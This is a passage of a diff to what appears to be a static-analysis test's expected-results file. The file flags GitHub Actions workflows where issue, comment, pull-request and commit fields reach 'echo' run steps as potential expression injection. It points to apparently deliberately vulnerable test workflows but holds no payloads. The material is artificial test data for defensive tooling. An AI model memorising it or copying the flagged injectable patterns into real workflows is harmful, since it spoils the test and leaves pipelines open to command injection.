steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | env.pr_message | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | steps.trim-url.outputs.trimmed_url | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | env.step_env | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | 